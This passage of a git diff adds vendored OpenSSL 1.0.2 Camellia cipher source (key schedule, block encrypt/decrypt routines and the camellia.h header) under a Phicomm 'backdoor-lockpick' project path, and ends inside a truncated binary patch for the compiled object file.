+        k[12] = s0, k[13] = s1, k[14] = s2, k[15] = s3;
+        RotLeft128(s0, s1, s2, s3, 15); /* KA <<< 30 */
+        k[16] = s0, k[17] = s1, k[18] = s2, k[19] = s3;
+        RotLeft128(s0, s1, s2, s3, 15); /* KA <<< 45 */
+        k[24] = s0, k[25] = s1;
+        RotLeft128(s0, s1, s2, s3, 15); /* KA <<< 60 */
+        k[28] = s0, k[29] = s1, k[30] = s2, k[31] = s3;
+        RotLeft128(s1, s2, s3, s0, 2); /* KA <<< 94 */
+        k[40] = s1, k[41] = s2, k[42] = s3, k[43] = s0;
+        RotLeft128(s1, s2, s3, s0, 17); /* KA <<<111 */
+        k[48] = s1, k[49] = s2, k[50] = s3, k[51] = s0;
+
+        s0 = k[0], s1 = k[1], s2 = k[2], s3 = k[3];
+        RotLeft128(s0, s1, s2, s3, 15); /* KL <<< 15 */
+        k[8] = s0, k[9] = s1, k[10] = s2, k[11] = s3;
+        RotLeft128(s0, s1, s2, s3, 30); /* KL <<< 45 */
+        k[20] = s0, k[21] = s1, k[22] = s2, k[23] = s3;
+        RotLeft128(s0, s1, s2, s3, 15); /* KL <<< 60 */
+        k[26] = s2, k[27] = s3;
+        RotLeft128(s0, s1, s2, s3, 17); /* KL <<< 77 */
+        k[32] = s0, k[33] = s1, k[34] = s2, k[35] = s3;
+        RotLeft128(s0, s1, s2, s3, 17); /* KL <<< 94 */
+        k[36] = s0, k[37] = s1, k[38] = s2, k[39] = s3;
+        RotLeft128(s0, s1, s2, s3, 17); /* KL <<<111 */
+        k[44] = s0, k[45] = s1, k[46] = s2, k[47] = s3;
+
+        return 3;               /* grand rounds */
+    } else {
+        k[12] = s0, k[13] = s1, k[14] = s2, k[15] = s3;
+        s0 ^= k[8], s1 ^= k[9], s2 ^= k[10], s3 ^= k[11];
+        Camellia_Feistel(s0, s1, s2, s3, (SIGMA + 8));
+        Camellia_Feistel(s2, s3, s0, s1, (SIGMA + 10));
+
+        k[4] = s0, k[5] = s1, k[6] = s2, k[7] = s3;
+        RotLeft128(s0, s1, s2, s3, 30); /* KB <<< 30 */
+        k[20] = s0, k[21] = s1, k[22] = s2, k[23] = s3;
+        RotLeft128(s0, s1, s2, s3, 30); /* KB <<< 60 */
+        k[40] = s0, k[41] = s1, k[42] = s2, k[43] = s3;
+        RotLeft128(s1, s2, s3, s0, 19); /* KB <<<111 */
+        k[64] = s1, k[65] = s2, k[66] = s3, k[67] = s0;
+
+        s0 = k[8], s1 = k[9], s2 = k[10], s3 = k[11];
+        RotLeft128(s0, s1, s2, s3, 15); /* KR <<< 15 */
+        k[8] = s0, k[9] = s1, k[10] = s2, k[11] = s3;
+        RotLeft128(s0, s1, s2, s3, 15); /* KR <<< 30 */
+        k[16] = s0, k[17] = s1, k[18] = s2, k[19] = s3;
+        RotLeft128(s0, s1, s2, s3, 30); /* KR <<< 60 */
+        k[36] = s0, k[37] = s1, k[38] = s2, k[39] = s3;
+        RotLeft128(s1, s2, s3, s0, 2); /* KR <<< 94 */
+        k[52] = s1, k[53] = s2, k[54] = s3, k[55] = s0;
+
+        s0 = k[12], s1 = k[13], s2 = k[14], s3 = k[15];
+        RotLeft128(s0, s1, s2, s3, 15); /* KA <<< 15 */
+        k[12] = s0, k[13] = s1, k[14] = s2, k[15] = s3;
+        RotLeft128(s0, s1, s2, s3, 30); /* KA <<< 45 */
+        k[28] = s0, k[29] = s1, k[30] = s2, k[31] = s3;
+        /* KA <<< 77 */
+        k[48] = s1, k[49] = s2, k[50] = s3, k[51] = s0;
+        RotLeft128(s1, s2, s3, s0, 17); /* KA <<< 94 */
+        k[56] = s1, k[57] = s2, k[58] = s3, k[59] = s0;
+
+        s0 = k[0], s1 = k[1], s2 = k[2], s3 = k[3];
+        RotLeft128(s1, s2, s3, s0, 13); /* KL <<< 45 */
+        k[24] = s1, k[25] = s2, k[26] = s3, k[27] = s0;
+        RotLeft128(s1, s2, s3, s0, 15); /* KL <<< 60 */
+        k[32] = s1, k[33] = s2, k[34] = s3, k[35] = s0;
+        RotLeft128(s1, s2, s3, s0, 17); /* KL <<< 77 */
+        k[44] = s1, k[45] = s2, k[46] = s3, k[47] = s0;
+        RotLeft128(s2, s3, s0, s1, 2); /* KL <<<111 */
+        k[60] = s2, k[61] = s3, k[62] = s0, k[63] = s1;
+
+        return 4;               /* grand rounds */
+    }
+    /*
+     * It is possible to perform certain precalculations, which
+     * would spare few cycles in block procedure. It's not done,
+     * because it upsets the performance balance between key
+     * setup and block procedures, negatively affecting overall
+     * throughput in applications operating on short messages
+     * and volatile keys.
+     */
+}
+
+void Camellia_EncryptBlock_Rounds(int grandRounds, const u8 plaintext[],
+                                  const KEY_TABLE_TYPE keyTable,
+                                  u8 ciphertext[])
+{
+    register u32 s0, s1, s2, s3;
+    const u32 *k = keyTable, *kend = keyTable + grandRounds * 16;
+
+    s0 = GETU32(plaintext) ^ k[0];
+    s1 = GETU32(plaintext + 4) ^ k[1];
+    s2 = GETU32(plaintext + 8) ^ k[2];
+    s3 = GETU32(plaintext + 12) ^ k[3];
+    k += 4;
+
+    while (1) {
+        /* Camellia makes 6 Feistel rounds */
+        Camellia_Feistel(s0, s1, s2, s3, k + 0);
+        Camellia_Feistel(s2, s3, s0, s1, k + 2);
+        Camellia_Feistel(s0, s1, s2, s3, k + 4);
+        Camellia_Feistel(s2, s3, s0, s1, k + 6);
+        Camellia_Feistel(s0, s1, s2, s3, k + 8);
+        Camellia_Feistel(s2, s3, s0, s1, k + 10);
+        k += 12;
+
+        if (k == kend)
+            break;
+
+        /*
+         * This is the same function as the diffusion function D of the
+         * accompanying documentation. See section 3.2 for properties of the
+         * FLlayer function.
+         */
+        s1 ^= LeftRotate(s0 & k[0], 1);
+        s2 ^= s3 | k[3];
+        s0 ^= s1 | k[1];
+        s3 ^= LeftRotate(s2 & k[2], 1);
+        k += 4;
+    }
+
+    s2 ^= k[0], s3 ^= k[1], s0 ^= k[2], s1 ^= k[3];
+
+    PUTU32(ciphertext, s2);
+    PUTU32(ciphertext + 4, s3);
+    PUTU32(ciphertext + 8, s0);
+    PUTU32(ciphertext + 12, s1);
+}
+
+void Camellia_EncryptBlock(int keyBitLength, const u8 plaintext[],
+                           const KEY_TABLE_TYPE keyTable, u8 ciphertext[])
+{
+    Camellia_EncryptBlock_Rounds(keyBitLength == 128 ? 3 : 4,
+                                 plaintext, keyTable, ciphertext);
+}
+
+void Camellia_DecryptBlock_Rounds(int grandRounds, const u8 ciphertext[],
+                                  const KEY_TABLE_TYPE keyTable,
+                                  u8 plaintext[])
+{
+    u32 s0, s1, s2, s3;
+    const u32 *k = keyTable + grandRounds * 16, *kend = keyTable + 4;
+
+    s0 = GETU32(ciphertext) ^ k[0];
+    s1 = GETU32(ciphertext + 4) ^ k[1];
+    s2 = GETU32(ciphertext + 8) ^ k[2];
+    s3 = GETU32(ciphertext + 12) ^ k[3];
+
+    while (1) {
+        /* Camellia makes 6 Feistel rounds */
+        k -= 12;
+        Camellia_Feistel(s0, s1, s2, s3, k + 10);
+        Camellia_Feistel(s2, s3, s0, s1, k + 8);
+        Camellia_Feistel(s0, s1, s2, s3, k + 6);
+        Camellia_Feistel(s2, s3, s0, s1, k + 4);
+        Camellia_Feistel(s0, s1, s2, s3, k + 2);
+        Camellia_Feistel(s2, s3, s0, s1, k + 0);
+
+        if (k == kend)
+            break;
+
+        /*
+         * This is the same function as the diffusion function D of the
+         * accompanying documentation. See section 3.2 for properties of the
+         * FLlayer function.
+         */
+        k -= 4;
+        s1 ^= LeftRotate(s0 & k[2], 1);
+        s2 ^= s3 | k[1];
+        s0 ^= s1 | k[3];
+        s3 ^= LeftRotate(s2 & k[0], 1);
+    }
+
+    k -= 4;
+    s2 ^= k[0], s3 ^= k[1], s0 ^= k[2], s1 ^= k[3];
+
+    PUTU32(plaintext, s2);
+    PUTU32(plaintext + 4, s3);
+    PUTU32(plaintext + 8, s0);
+    PUTU32(plaintext + 12, s1);
+}
+
+void Camellia_DecryptBlock(int keyBitLength, const u8 plaintext[],
+                           const KEY_TABLE_TYPE keyTable, u8 ciphertext[])
+{
+    Camellia_DecryptBlock_Rounds(keyBitLength == 128 ? 3 : 4,
+                                 plaintext, keyTable, ciphertext);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/camellia.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/camellia.h
new file mode 100644
index 0000000..9be7c0f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/camellia.h
@@ -0,0 +1,132 @@
+/* crypto/camellia/camellia.h -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#ifndef HEADER_CAMELLIA_H
+# define HEADER_CAMELLIA_H
+
+# include <openssl/opensslconf.h>
+
+# ifdef OPENSSL_NO_CAMELLIA
+#  error CAMELLIA is disabled.
+# endif
+
+# include <stddef.h>
+
+# define CAMELLIA_ENCRYPT        1
+# define CAMELLIA_DECRYPT        0
+
+/*
+ * Because array size can't be a const in C, the following two are macros.
+ * Both sizes are in bytes.
+ */
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* This should be a hidden type, but EVP requires that the size be known */
+
+# define CAMELLIA_BLOCK_SIZE 16
+# define CAMELLIA_TABLE_BYTE_LEN 272
+# define CAMELLIA_TABLE_WORD_LEN (CAMELLIA_TABLE_BYTE_LEN / 4)
+
+typedef unsigned int KEY_TABLE_TYPE[CAMELLIA_TABLE_WORD_LEN]; /* to match
+                                                               * with WORD */
+
+struct camellia_key_st {
+    union {
+        double d;               /* ensures 64-bit align */
+        KEY_TABLE_TYPE rd_key;
+    } u;
+    int grand_rounds;
+};
+typedef struct camellia_key_st CAMELLIA_KEY;
+
+# ifdef OPENSSL_FIPS
+int private_Camellia_set_key(const unsigned char *userKey, const int bits,
+                             CAMELLIA_KEY *key);
+# endif
+int Camellia_set_key(const unsigned char *userKey, const int bits,
+                     CAMELLIA_KEY *key);
+
+void Camellia_encrypt(const unsigned char *in, unsigned char *out,
+                      const CAMELLIA_KEY *key);
+void Camellia_decrypt(const unsigned char *in, unsigned char *out,
+                      const CAMELLIA_KEY *key);
+
+void Camellia_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                          const CAMELLIA_KEY *key, const int enc);
+void Camellia_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                          size_t length, const CAMELLIA_KEY *key,
+                          unsigned char *ivec, const int enc);
+void Camellia_cfb128_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t length, const CAMELLIA_KEY *key,
+                             unsigned char *ivec, int *num, const int enc);
+void Camellia_cfb1_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t length, const CAMELLIA_KEY *key,
+                           unsigned char *ivec, int *num, const int enc);
+void Camellia_cfb8_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t length, const CAMELLIA_KEY *key,
+                           unsigned char *ivec, int *num, const int enc);
+void Camellia_ofb128_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t length, const CAMELLIA_KEY *key,
+                             unsigned char *ivec, int *num);
+void Camellia_ctr128_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t length, const CAMELLIA_KEY *key,
+                             unsigned char ivec[CAMELLIA_BLOCK_SIZE],
+                             unsigned char ecount_buf[CAMELLIA_BLOCK_SIZE],
+                             unsigned int *num);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif                          /* !HEADER_Camellia_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/camellia.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/camellia.o
new file mode 100644
index 0000000000000000000000000000000000000000..ba4ee6390a0e22cf4e5d5aca1098d6cc9efd25e1
GIT binary patch
literal 11696
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
